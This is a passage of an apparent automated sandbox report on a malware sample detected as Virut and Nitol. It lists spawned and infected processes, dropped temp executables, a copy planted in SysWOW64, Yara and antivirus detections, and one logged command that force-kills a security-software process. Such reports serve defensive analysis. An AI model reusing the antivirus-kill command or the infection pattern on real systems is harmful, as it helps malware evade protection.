Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000006.00000002.2017093698.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000006.00000002.2017013687.000000007FE20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: CN_disclosed_20180208_Mal1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp, Author: Florian Roth Rule: MAL_Nitol_Malware_Jan19_1, Description: Detects Nitol Malware, Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 97%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:33:24
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\hrl97AF.tmp
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\hrl97AF.tmp
Imagebase:	0x400000
File size:	522'752 bytes
MD5 hash:	F3F920AAF85289A8E532890BC618AADD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000002.2043911687.000000007FE20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000002.2043996617.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: CN_disclosed_20180208_Mal1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp, Author: Florian Roth Rule: MAL_Nitol_Malware_Jan19_1, Description: Detects Nitol Malware, Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 97%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:33:24
Start date:	19/12/2024
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff7f7550000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000008.00000002.2741922410.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000008.00000000.1491843448.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000008.00000002.2741748612.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	09:33:24
Start date:	19/12/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff7bf4f0000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000002.2742603638.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000002.2743903996.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000000.1491890758.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	09:33:25
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000A.00000002.2741922176.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000A.00000002.2741745861.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	09:33:25
Start date:	19/12/2024
Path:	C:\Windows\System32\fontdrvhost.exe
Wow64 process (32bit):	false
Commandline:	"fontdrvhost.exe"
Imagebase:	0x7ff6791b0000
File size:	827'408 bytes
MD5 hash:	BBCB897697B3442657C7D6E3EDDBD25F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000002.2798955144.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000000.1495302635.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000002.2798310722.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	09:33:25
Start date:	19/12/2024
Path:	C:\Windows\System32\fontdrvhost.exe
Wow64 process (32bit):	false
Commandline:	"fontdrvhost.exe"
Imagebase:	0x7ff6791b0000
File size:	827'408 bytes
MD5 hash:	BBCB897697B3442657C7D6E3EDDBD25F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000002.2798846486.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000000.1496798093.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000002.2798238281.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	09:33:25
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k RPCSS -p
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000002.2743908241.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.1498055145.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000002.2742703107.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	09:33:25
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000002.2742198516.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000002.2741867843.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	09:33:26
Start date:	19/12/2024
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	"dwm.exe"
Imagebase:	0x7ff6f73e0000
File size:	94'720 bytes
MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000002.2798456887.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000002.2798241222.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000000.1509586132.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	09:33:26
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000010.00000002.2743736063.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000010.00000002.2743087540.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000010.00000000.1509606581.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	09:33:26
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000000.1512389471.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000002.2742837753.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000002.2743537432.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	09:33:27
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000012.00000002.2742331815.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000012.00000000.1514452533.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000012.00000002.2742840917.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	09:33:27
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000013.00000000.1516357060.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000013.00000002.2743461282.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000013.00000002.2744126681.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	09:33:27
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\26B1sczZ88.dll,LpkDrawTextEx
Imagebase:	0x960000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	09:33:27
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\hrlA367.tmp
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\hrlA367.tmp
Imagebase:	0x400000
File size:	522'752 bytes
MD5 hash:	F3F920AAF85289A8E532890BC618AADD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000015.00000002.2066888535.000000007FE40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: CN_disclosed_20180208_Mal1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp, Author: Florian Roth Rule: MAL_Nitol_Malware_Jan19_1, Description: Detects Nitol Malware, Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 97%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	09:33:27
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000000.1519926327.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000002.2743037216.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000002.2742450602.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	09:33:27
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000017.00000000.1522184005.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000017.00000002.2742914219.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000017.00000002.2742335064.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	09:33:28
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000018.00000002.2743542686.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000018.00000002.2744224357.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000018.00000000.1525893859.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	09:33:29
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000000.1537557780.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000002.2742759300.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000002.2742301520.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	09:33:29
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000002.2744241055.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000000.1542306261.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000002.2742498334.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	09:33:30
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001B.00000002.2741797049.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001B.00000002.2742552059.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	09:33:30
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\26B1sczZ88.dll,LpkEditControl
Imagebase:	0x960000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	09:33:30
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001D.00000002.2741751352.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001D.00000002.2742525977.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	09:33:30
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp
Imagebase:	0x400000
File size:	522'752 bytes
MD5 hash:	F3F920AAF85289A8E532890BC618AADD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: CN_disclosed_20180208_Mal1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp, Author: Florian Roth Rule: MAL_Nitol_Malware_Jan19_1, Description: Detects Nitol Malware, Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 97%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	09:33:30
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001F.00000002.2744487406.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001F.00000000.1550287003.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001F.00000002.2742576822.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	09:33:31
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im ZhuDongFangYu.exe /t
Imagebase:	0xf80000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	09:33:31
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	09:33:31
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\zvhcfa.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\zvhcfa.exe
Imagebase:	0x400000
File size:	522'752 bytes
MD5 hash:	F3F920AAF85289A8E532890BC618AADD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: CN_disclosed_20180208_Mal1, Description: Detects malware from disclosed CN malware set, Source: C:\Windows\SysWOW64\zvhcfa.exe, Author: Florian Roth Rule: MAL_Nitol_Malware_Jan19_1, Description: Detects Nitol Malware, Source: C:\Windows\SysWOW64\zvhcfa.exe, Author: Florian Roth
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 97%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	09:33:31
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000023.00000002.2743363395.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000023.00000002.2742760458.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	09:33:31
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000024.00000002.2743906496.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000024.00000002.2742677643.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	09:33:32
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000025.00000002.2743367209.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000025.00000002.2741930750.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000025.00000000.1564612279.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	09:33:32
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000026.00000002.2743535164.000000007FFC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000026.00000002.2742839099.000000007FFB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	09:33:32
Start date:	19/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
Imagebase:	0x7ff77afe0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
